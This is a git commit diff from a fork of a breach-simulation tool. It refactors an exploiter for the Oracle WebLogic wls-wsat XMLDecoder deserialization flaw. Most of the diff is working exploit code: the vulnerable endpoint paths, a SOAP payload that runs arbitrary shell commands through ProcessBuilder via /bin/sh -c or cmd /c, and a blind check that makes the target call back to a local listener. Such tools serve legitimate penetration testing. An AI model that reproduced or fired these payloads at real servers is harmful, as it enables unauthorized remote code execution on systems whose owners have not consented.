forked from p15670423/monkey
Notes fixed and tested
This commit is contained in:
Vakaris
parent
39bb41ed25
commit
307a7c396c
|
|
@ -191,7 +191,8 @@ class Configuration(object):
|
|||
|
||||
# TCP Scanner
|
||||
HTTP_PORTS = [80, 8080, 443,
|
||||
8008, 7001 # HTTP alternate
|
||||
8008, # HTTP alternate
|
||||
7001 # Oracle Weblogic default server port
|
||||
]
|
||||
tcp_target_ports = [22,
|
||||
2222,
|
||||
|
|
|
|||
|
|
@ -17,11 +17,11 @@ import logging
|
|||
__author__ = "VakarisZ"
|
||||
|
||||
LOG = logging.getLogger(__name__)
|
||||
# How long server waits for get request
|
||||
# How long server waits for get request in seconds
|
||||
SERVER_TIMEOUT = 4
|
||||
# How long to wait for a request to go to vuln machine and then to our server from there
|
||||
# How long to wait for a request to go to vuln machine and then to our server from there. In seconds
|
||||
REQUEST_TIMEOUT = 2
|
||||
# How long to wait for response in exploitation
|
||||
# How long to wait for response in exploitation. In seconds
|
||||
EXECUTION_TIMEOUT = 15
|
||||
URLS = ["/wls-wsat/CoordinatorPortType",
|
||||
"/wls-wsat/CoordinatorPortType11",
|
||||
|
|
@ -55,40 +55,10 @@ class WebLogicExploiter(WebRCE):
|
|||
return exploit_config
|
||||
|
||||
def exploit(self, url, command):
|
||||
empty_payload = '''<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
|
||||
<soapenv:Header>
|
||||
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
|
||||
<java>
|
||||
<object class="java.lang.ProcessBuilder">
|
||||
<array class="java.lang.String" length="3" >
|
||||
<void index="0">
|
||||
<string>{cmd_base}</string>
|
||||
</void>
|
||||
<void index="1">
|
||||
<string>{cmd_opt}</string>
|
||||
</void>
|
||||
<void index="2">
|
||||
<string>{cmd_payload}</string>
|
||||
</void>
|
||||
</array>
|
||||
<void method="start"/>
|
||||
</object>
|
||||
</java>
|
||||
</work:WorkContext>
|
||||
</soapenv:Header>
|
||||
<soapenv:Body/>
|
||||
</soapenv:Envelope>
|
||||
'''
|
||||
if 'linux' in self.host.os['type']:
|
||||
cmd_base = '/bin/sh'
|
||||
cmd_opt = '-c'
|
||||
command += ' 1> /dev/null 2> /dev/null'
|
||||
payload = self.exploit_payload('/bin/sh', '-c', command + ' 1> /dev/null 2> /dev/null')
|
||||
else:
|
||||
cmd_base = 'cmd'
|
||||
cmd_opt = '/c'
|
||||
command += ' 1> NUL 2> NUL'
|
||||
|
||||
payload = empty_payload.format(cmd_base=cmd_base, cmd_opt=cmd_opt, cmd_payload=command)
|
||||
payload = self.exploit_payload('cmd', '/c', command + ' 1> NUL 2> NUL')
|
||||
try:
|
||||
post(url, data=payload, headers=HEADERS, timeout=EXECUTION_TIMEOUT, verify=False)
|
||||
except Exception as e:
|
||||
|
|
@ -96,7 +66,7 @@ class WebLogicExploiter(WebRCE):
|
|||
print(e)
|
||||
return True
|
||||
|
||||
class HTTPServer(threading.Thread):
|
||||
class IndicationHTTPServer(threading.Thread):
|
||||
"""
|
||||
Http server built to wait for GET requests. Because oracle web logic vuln is blind,
|
||||
we determine if we can exploit by either getting a GET request from host or not.
|
||||
|
|
@ -109,6 +79,7 @@ class WebLogicExploiter(WebRCE):
|
|||
self._stopped = False
|
||||
self.lock = lock
|
||||
threading.Thread.__init__(self)
|
||||
self.daemon = True
|
||||
|
||||
def run(self):
|
||||
class S(BaseHTTPRequestHandler):
|
||||
|
|
@ -132,43 +103,81 @@ class WebLogicExploiter(WebRCE):
|
|||
|
||||
def check_if_exploitable(self, url):
|
||||
# Server might get response faster than it starts listening to it, we need a lock
|
||||
lock = threading.Lock()
|
||||
local_port = get_free_tcp_port()
|
||||
local_ip = get_interface_to_target(self.host.ip_addr)
|
||||
httpd = WebLogicExploiter.HTTPServer(local_ip, local_port, lock)
|
||||
httpd.daemon = True
|
||||
lock.acquire()
|
||||
httpd.start()
|
||||
lock.acquire()
|
||||
generic_check_payload = '''<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
|
||||
<soapenv:Header>
|
||||
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
|
||||
<java version="1.8" class="java.beans.XMLDecoder">
|
||||
<void id="url" class="java.net.URL">
|
||||
<string>http://{lhost}:{lport}</string>
|
||||
</void>
|
||||
<void idref="url">
|
||||
<void id="stream" method = "openStream" />
|
||||
</void>
|
||||
</java>
|
||||
</work:WorkContext>
|
||||
</soapenv:Header>
|
||||
<soapenv:Body/>
|
||||
</soapenv:Envelope>
|
||||
'''
|
||||
payload = generic_check_payload.format(lhost=local_ip, lport=local_port)
|
||||
httpd, lock = self._start_http_server()
|
||||
payload = self.test_payload(ip=httpd._local_ip, port=httpd._local_port)
|
||||
try:
|
||||
post(url, data=payload, headers=HEADERS, timeout=REQUEST_TIMEOUT, verify=False)
|
||||
except exceptions.ReadTimeout:
|
||||
# Our request does not get response thus we get ReadTimeout error
|
||||
pass
|
||||
except Exception as e:
|
||||
LOG.error("Something went wrong: %s" % e)
|
||||
self._stop_http_server(httpd, lock)
|
||||
return httpd.get_requests > 0
|
||||
|
||||
def _start_http_server(self):
|
||||
lock = threading.Lock()
|
||||
local_port = get_free_tcp_port()
|
||||
local_ip = get_interface_to_target(self.host.ip_addr)
|
||||
httpd = self.IndicationHTTPServer(local_ip, local_port, lock)
|
||||
lock.acquire()
|
||||
httpd.start()
|
||||
lock.acquire()
|
||||
return httpd, lock
|
||||
|
||||
def _stop_http_server(self, httpd, lock):
|
||||
lock.release()
|
||||
httpd.join(SERVER_TIMEOUT)
|
||||
httpd.stop()
|
||||
if httpd.get_requests > 0:
|
||||
exploited = True
|
||||
else:
|
||||
exploited = False
|
||||
return exploited
|
||||
return True
|
||||
|
||||
|
||||
@staticmethod
|
||||
def exploit_payload(cmd_base, cmd_opt, command):
|
||||
empty_payload = '''<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
|
||||
<soapenv:Header>
|
||||
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
|
||||
<java>
|
||||
<object class="java.lang.ProcessBuilder">
|
||||
<array class="java.lang.String" length="3" >
|
||||
<void index="0">
|
||||
<string>{cmd_base}</string>
|
||||
</void>
|
||||
<void index="1">
|
||||
<string>{cmd_opt}</string>
|
||||
</void>
|
||||
<void index="2">
|
||||
<string>{cmd_payload}</string>
|
||||
</void>
|
||||
</array>
|
||||
<void method="start"/>
|
||||
</object>
|
||||
</java>
|
||||
</work:WorkContext>
|
||||
</soapenv:Header>
|
||||
<soapenv:Body/>
|
||||
</soapenv:Envelope>
|
||||
'''
|
||||
payload = empty_payload.format(cmd_base=cmd_base, cmd_opt=cmd_opt, cmd_payload=command)
|
||||
return payload
|
||||
|
||||
@staticmethod
|
||||
def test_payload(ip, port):
|
||||
generic_check_payload = '''<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
|
||||
<soapenv:Header>
|
||||
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
|
||||
<java version="1.8" class="java.beans.XMLDecoder">
|
||||
<void id="url" class="java.net.URL">
|
||||
<string>http://{host}:{port}</string>
|
||||
</void>
|
||||
<void idref="url">
|
||||
<void id="stream" method = "openStream" />
|
||||
</void>
|
||||
</java>
|
||||
</work:WorkContext>
|
||||
</soapenv:Header>
|
||||
<soapenv:Body/>
|
||||
</soapenv:Envelope>
|
||||
'''
|
||||
payload = generic_check_payload.format(host=ip, port=port)
|
||||
return payload
|
||||
|
|
|
|||
Loading…
Reference in New Issue